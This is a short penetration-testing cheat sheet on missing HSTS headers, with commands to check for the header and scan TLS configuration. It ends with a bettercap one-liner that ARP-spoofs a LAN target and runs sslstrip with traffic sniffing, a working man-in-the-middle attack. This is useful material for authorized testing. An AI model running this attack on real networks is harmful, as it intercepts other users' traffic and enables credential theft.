HTTP Strict Transport Security

Check List

Cheat Sheet

Methodology

Missing HSTS (HTTP Strict Transport Security)

1

Access the Target URL and Inspect the Response Headers Use a tool such as Burp Suite, cURL, or browser dev tools to inspect the HTTP response headers The best way is to use this cheat sheet Example using cURL

2

Check for HSTS Header Confirm the absence of the following header in the server response Strict-Transport-Security The best way to exploit and exploit this vulnerability is to use a cheat sheet


Recon Header

curl -s -D- $WEBSITE | grep -i strict

nmap -sS -sV --mtu 5000 --script ssl-enum-ciphers $WEBSITE

Scan Vulnerabilities

sslyze $WEBSITE

testssl $WEBSITE

MitM

Interface Network

INTERFACE=$(ip -o -4 addr show | awk '{print $2}' | grep -v "lo" | head -n 1)

MitM on LAN

bettercap -iface $INTERFACE -eval "set arp.spoof.targets $TARGET; arp.spoof on; http.proxy on; http.proxy.sslstrip true; net.sniff on"

Last updated